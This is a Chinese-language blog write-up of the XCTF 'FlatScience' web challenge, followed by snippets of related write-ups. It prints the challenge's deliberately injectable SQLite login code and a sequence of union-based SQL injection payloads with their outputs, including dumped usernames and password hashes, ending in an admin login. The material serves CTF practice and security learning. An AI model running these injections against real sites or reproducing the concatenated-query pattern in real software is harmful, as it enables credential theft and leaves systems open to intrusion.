攻防世界flatscinece

最新推荐文章于 2024-04-06 23:00:41 发布
最新推荐文章于 2024-04-06 23:00:41 发布
阅读量402 收藏 7
点赞数 7
分类专栏: ctf刷题记录 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74925562/article/details/136025044
版权

攻防世界flatscinece题解

目录扫描发现
在这里插入图片描述

login.php处发现sql注入是sqlite数据库的注入,这方面的注入我不是太熟,趁这次机会也学点东西,做点笔记

脑洞很大的一道题,可能是因为我英文不好
在这里插入图片描述

网上的题解说这里有提示将?debug加在login.php后面,login.php?debug这样

在这里插入图片描述

然后就得到了源代码

之前我尝试手工sqlite注入时出现了一些问题,应该在这里可以找到答案,而且在查询列名和数据库版本时会有跳转,不知道什么原因

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>

查看源码可以发现把查询结果放在了cookie值里

通过下面的语句查询

sqlite_master是类似于mysql的information_schema的一张表

1’ union select name,sql from sqlite_master

sqlite_master里面包含了数据库的元信息

在这里插入图片描述

在这里插入图片描述

发送之后得到

CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29

解码一下

CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

rimary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

这个应该是表里存储的创建表的语句
可以发现在users表里有四个列id name password hint

尝试读取一下因为列里面肯定有多个数据,所以使用group_concat,聚合成一行读出来

查id

-1' union select 1,group_concat(id) from Users;

返回

1,2,3

查name

-1' union select 1,group_concat(name) from Users;

返回

admin,fritze,hansi

查password

-1' union select 1,group_concat(password) from Users;

返回

3fab54a50e770d830c0416df817567662a9dc85c,54eae8935c90f467427f05e4ece82cf569f89507,34b0bb7c304949f9ff2fc101eef0f048be10d3bd

从上面的源码看出来这是经过sha1加密后的字符串

查hint

-1' union select 1,group_concat(hint) from Users;

返回

my+fav+word+in+my+fav+paper?!,my+love+is…?,the+password+is+password

不管这个奇怪的hint了

这里可以找一个python脚本去解密那个哈希值但我直接去MD5解密网站尝试一下
在这里插入图片描述
哈,笑死了admin.php登录,就可以拿flag了
在这里插入图片描述

logan.x
关注
专栏目录
攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 315
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
攻防世界-FlatScience
m0_47571887的博客
11-20 951
打开题目,左右看了看,就是一些文章,试了下robots.txt,看到两个php 挨个访问,发现admin.php和login.ogo都是一个登陆页面,不过admin.php有一个默认的admin账号,猜测应该是获取到密码拿到flag,我们看看login.php里面有什么 在login.php页面里,我习惯性的先看一下源码,发现了一个?debug 提交过后,返回了一段源码, 这里我们看到数据库是SQLite3,不是MySQL,在sqlite数据库有一张sqlite_master表,..
攻防世界FlatScience
最新发布
wangzhemvp的博客
04-06 1156
想到在查看 robots.txt 的时候有个 admin.php,选 admin 来破解,根据 hint 猜测 fav word 藏在前面看到的 pdf 里面,需要写个脚本,把里面的词都给提取出来,拼接上”Salz!想办法把 pdf 文件都给爬下来。输入 http://61.147.171.105:61912/login.php/name 等同于 if 语句中的 id,sql 等同于 name。在login.php 中发现。
攻防世界 web FlatScience
tothemoon的博客
03-04 391
打开网页后每个转跳都点一下发现都是pdf文件除了here 进入了根目录1,然后点here或者these会进入不同的根目录。 这也太难看出其中的奥秘了,用dirsearch跑一下。 经过测试后:发现login.php与admin.php是解题的关键 ...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
[CTF题目总结-web篇]攻防世界flatscience
T2hunz1
01-13 1745
[CTF题目总结-web篇]攻防世界flatscience
攻防世界-web-FlatScience
wuh2333的博客
10-25 446
攻防世界webFlatScience
xctf 攻防世界 FlatScience wp
qq_43054896的博客
03-08 878
一、dirsearch 扫目录 python dirsearch.py -u URL -e * 二、查看正常响应的链接和源码 admin.php 有登录框,注入只有Nono! Stahp?! login.php 也有登录框,逻辑注入就跳转了,说明是存在注入的 输入 admin’ order by 3 #,出现报错,是sqlite数据库: 查看页面源码,提示去 URL?debug 页面: ...
攻防世界WEB】难度四星12分进阶题:FlatScience
07-23 692
攻防世界WEB】四星12分
攻防世界----(web进阶)FlatScience--WP
xiaoduanDDG的博客
04-14 498
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到l...
攻防世界】二十四 --- FlatScience --- SQLite注入
qq_43168364的博客
01-26 1359
题目 ---- FlatScience 一、writeup 二、知识点
攻防世界-Web高手进阶区-FlatScience
feng的博客
09-13 682
前言 我只能说,神仙题。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,分别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我分别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界web进阶区FlatScience详解
hxhxhxhxx的博客
08-06 2880
攻防世界web进阶区FlatScience题目解法 题目 解法 我们一个一个点进去发现也就是一些论文之类的 我们御剑发现了一些东西 robots。txt 我们登录试试 在login页面有报错,我们猜测是sql注入 他的源码中写到,登录是你不可能绕过的 这里源码中出现了?debug,可能是一个调试页面,我们访问看看 <?php if(isset($_POST['usr']) && isset($_POST['pw'])){ $user = $_POST['u
攻防世界序列化漏洞详解与利用
"攻防世界序列化问题详解" 在网络安全领域,尤其是CTF(Capture The Flag)挑战中,序列化和反序列化是常见的漏洞利用点。本篇内容主要聚焦于攻防世界平台中涉及的序列化问题,通过一道具体的题目来深入解析这一...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值